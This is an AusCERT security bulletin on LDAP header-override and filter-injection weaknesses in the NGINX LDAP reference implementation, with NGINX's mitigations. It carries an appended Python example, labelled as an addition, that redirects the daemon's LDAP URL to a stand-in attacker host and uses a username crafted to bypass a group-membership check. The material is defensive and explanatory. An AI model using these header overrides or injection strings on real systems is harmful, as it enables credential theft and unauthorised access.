-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT Security Bulletin ASB-2022.0086.3
                         NGINX Zero-Day
                         14 April 2022
===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Nginx Zero-Day
Operating System:  UNIX variants (UNIX, Linux, OSX)
                   Windows
Resolution:        Mitigation

Revision History:  April 14 2022: Re-formatting
                   April 13 2022: Formatting
                   April 13 2022: Initial Release

OVERVIEW

        A new zero-day vulnerability in the Nginx web server has been
        claimed by a hacktivist group calling itself "Against the West",
        which says it allows remote code execution on a vulnerable
        system. [3]

        NGINX confirmed security vulnerabilities in the NGINX LDAP
        reference implementation only: "NGINX Open Source and NGINX Plus
        are not themselves affected, and no corrective action is
        necessary if you do not use the reference implementation." [1]

        NGINX noted in its advisory that the code is published as a
        reference implementation and is not a production-grade LDAP
        solution: "For example, there is no encryption of the username
        and password used for the sample login page, and security
        notices call this out." [3]

        The group states that it has reported its findings to the NGINX
        team and is seeking a reward, and also claims to have been
        offered significant sums for the exploit by other interested
        parties. [4]

IMPACT

        NGINX determined that only the reference implementation is
        affected, and that exploitation requires specific conditions:
        "When configuration parameters are specified on the command line,
        an attacker can override some or all of them by passing specially
        crafted HTTP request headers." [1]

        The conditions for exploitation are [1]:

        1. Command-line parameters are used to configure the Python daemon
        2. There are unused, optional configuration parameters
        3.
        LDAP authentication depends on specific group membership

MITIGATION

        NGINX suggested the following mitigations [1]:

        Mitigating Condition 1: Command-Line Parameters Are Used to
        Configure the Python Daemon

        When configuration parameters are specified on the command line,
        an attacker can override some or all of them by passing specially
        crafted HTTP request headers. To protect against this, ensure that
        the corresponding configuration parameters have an empty value in
        the location = /auth-proxy block in the NGINX configuration
        (nginx-ldap-auth.conf in the repo). A header given an empty value
        there is not passed on to the daemon at all, so a client-supplied
        copy of it is discarded and the command-line value is used.

        Mitigating Condition 2: Unused, Optional Configuration Parameters

        As in Condition 1, an attacker can pass specially crafted HTTP
        request headers to override certain configuration parameters,
        depending on the configuration used for the LDAP search template.
        To protect against this, ensure that any unused, optional
        parameters have an empty value in the location = /auth-proxy
        block in the NGINX configuration.

        Mitigating Condition 3: LDAP Group Membership Is Required

        The Python daemon does not sanitize its inputs. To mitigate this,
        ensure that the backend daemon that presents the login form strips
        any special characters from the username field. In particular, it
        must remove the opening and closing parenthesis characters - ( ) -
        and the equal sign (=), which all have special meaning for LDAP
        servers. The backend daemon in the LDAP reference implementation
        will be updated in this way in due course.

REFERENCES

        [1] Addressing Security Weaknesses in the NGINX LDAP Reference
            Implementation
            https://www.nginx.com/blog/addressing-security-weaknesses-nginx-ldap-reference-implementation/

        [2] Nginx Zero-Day RCE Vulnerability Alert
            https://securityonline.info/nginx-zero-day-rce-vulnerability-alert/

        [3] Is there a 0day in NGINX?
            F5 investigates claims, finds LDAP issues
            https://thestack.technology/nginx0-day-claims/

        [4] NginxDay
            https://github.com/AgainstTheWest/NginxDay

AusCERT has made every effort to ensure that the information contained in
this document is accurate. However, the decision to use the information
described is the responsibility of each user or organisation. The decision
to follow or act on information or advice contained in this security
bulletin is the responsibility of each user or organisation, and should be
considered in accordance with your organisation's site policies and
procedures. AusCERT takes no responsibility for consequences which may
arise from following or acting on information or advice contained in this
security bulletin.

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
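        Worked example (added here; not part of the AusCERT bulletin, the
        NGINX advisory, or the reference implementation). It models the
        request path behind the three conditions and their mitigations:
        how nginx forwards X-Ldap-* request headers to the Python daemon
        for a subrequest to location = /auth-proxy, how a client header
        beats a command-line value in the daemon (Conditions 1 and 2),
        what a proxy_set_header with an empty value does to that, and how
        an unsanitized username rewrites a group-membership search filter
        (Condition 3) compared with the advisory's strip-the-metacharacters
        fix and with RFC 4515 escaping. The header names, the
        %(username)s template placeholder and the header-over-default
        lookup are assumptions based on the reference repository; every
        hostname, DN, secret and username is constructed.

```python
"""Model of the nginx-ldap-auth request path described in the bulletin.

Added example, not code from the NGINX LDAP reference implementation.
Header names, the %(username)s placeholder and the "request header wins
over the default" lookup are assumptions based on the reference repository;
all hostnames, DNs, secrets and usernames are constructed test data.
"""

# parameter -> (request header the daemon reads, value used when absent).
# The "absent" value stands in for the daemon's command-line parameter.
PARAMS = {
    "url":      ("X-Ldap-URL",      "ldap://ldap.example.com:389"),
    "basedn":   ("X-Ldap-BaseDN",   "ou=people,dc=example,dc=com"),
    "binddn":   ("X-Ldap-BindDN",   "cn=nginx-auth,dc=example,dc=com"),
    "bindpass": ("X-Ldap-BindPass", "constructed-bind-secret"),
    "starttls": ("X-Ldap-Starttls", "true"),
    # Condition 3: the search template requires membership of a group.
    "template": ("X-Ldap-Template",
                 "(&(cn=%(username)s)"
                 "(memberOf=cn=nginx-users,ou=groups,dc=example,dc=com))"),
}

GROUP_TEMPLATE = PARAMS["template"][1]


def nginx_forward(client_headers, proxy_set_header):
    """Headers the daemon receives for a subrequest to location = /auth-proxy.

    nginx passes the client's request headers through unless a
    proxy_set_header directive names the header: a non-empty value replaces
    it, and an empty value ("") causes the header not to be passed at all.
    That second behaviour is the "empty value" mitigation for Conditions 1
    and 2. Header names are compared case-insensitively.
    """
    forwarded = {name.lower(): value for name, value in client_headers.items()}
    for name, value in proxy_set_header.items():
        if value == "":
            forwarded.pop(name.lower(), None)
        else:
            forwarded[name.lower()] = value
    return forwarded


def daemon_params(forwarded):
    """Daemon-side resolution: a request header wins over the default."""
    return {key: forwarded.get(header.lower(), default)
            for key, (header, default) in PARAMS.items()}


def build_filter(template, username):
    """Filter construction as the advisory describes it: no sanitization."""
    return template % {"username": username}


def strip_metachars(username):
    """The advisory's Condition 3 mitigation: drop '(', ')' and '='."""
    return "".join(ch for ch in username if ch not in "()=")


def escape_filter_value(value):
    """RFC 4515 escaping, a stricter alternative that keeps the characters
    but makes them literal: backslash, '*', '(', ')' and NUL become \\XX."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch
                   for ch in value)


def demo():
    """Return the outcomes worth comparing (the tests assert on these)."""
    attacker = {"X-Ldap-URL": "ldap://attacker.example:389"}
    # Condition 1: URL left to the command line, nothing pinned in nginx,
    # so the client's header reaches the daemon and replaces it.
    overridden = daemon_params(nginx_forward(attacker, {}))["url"]
    # Mitigation: proxy_set_header X-Ldap-URL ""; in the /auth-proxy block.
    pinned = daemon_params(nginx_forward(attacker, {"X-Ldap-URL": ""}))["url"]

    # Condition 3: a user outside nginx-users wraps the group clause in an
    # OR that their own cn already satisfies, so the group test is bypassed.
    user = "bob)(|(cn=bob"
    return {
        "url_overridden": overridden,
        "url_pinned": pinned,
        "filter_raw": build_filter(GROUP_TEMPLATE, user),
        "filter_stripped": build_filter(GROUP_TEMPLATE, strip_metachars(user)),
        "filter_escaped": build_filter(GROUP_TEMPLATE, escape_filter_value(user)),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-16s %s" % (name, value))
```

        In the unpinned case the daemon's LDAP URL is whatever the client
        sent, so the modelled daemon would open its connection, and present
        its configured bind DN and password, to a host of the attacker's
        choosing; with the empty proxy_set_header the command-line value
        survives. For Condition 3 the raw filter parses as
        AND(cn=bob, OR(cn=bob, memberOf=...)), which any account named bob
        satisfies regardless of group; stripping leaves a harmless
        cn=bob|cnbob, and RFC 4515 escaping keeps the characters while
        removing their filter meaning.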
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYldMtONLKJtyKPYoAQh5/Q//aOBO5bfpEUidaXJwIcdSumm9thOoUPDf
V56Am+WBZgZGPUrU+g0YLunGV4f8vvQrujfKF6M6XdrTqcRmm5ikdMeuWcpuDL0v
ZT292akonXlDMYjzpPPEW/n5iJXa4Cdtak1KEUM1VNEZc0Zd8R6jMRN07eIGXruo
p0ihV062JUTP4+1Z3t6pdkeWIv8IvDzyINXsoP2JMmLtntrTaHeY7cf4dzFKwOEA
/3lNZSTCQM+zBAjUQtcpZ9e83nMy6ShU4TGZ3hva2UyNH7H+NGJbAe7pRtBe0YqX
EPgNZN1Auh+5HR2jVTwYbFucXNVhvXsD89Crs96yC9w2iAOE8rnLidW7C1Db2U+X
UmltsDgPcwnaS9uBAKqVqHoWJM2o4RuDIdeekJJ60bIUl+XVYg6zBw3HKAFdrFZy
s8hqayogc+112+AhCvo9buErzCVfjpN+9w5BzSXM7oct8xZPk9aDOdA/RkGkuZ6Z
gi44/i+nNBZ3a3aOd2/rS0P4wZkk6i7mBOhshUhezpYdyc56qwyyoNwxefQ+YMye
LGAin8mi1vCEgyJ5dKLxLrv0XTUFo8JMc0gKJGhpPgxCmHmQbDpRVrOJgRUNnjQQ
670MgXDwWmwG8fUg9ju/xn76x9VGNEFs3/X9qdvpvyHPvlnzDsB7/U9ovwwdb9RH
LkBoQL2B5zM=
=POtm
-----END PGP SIGNATURE-----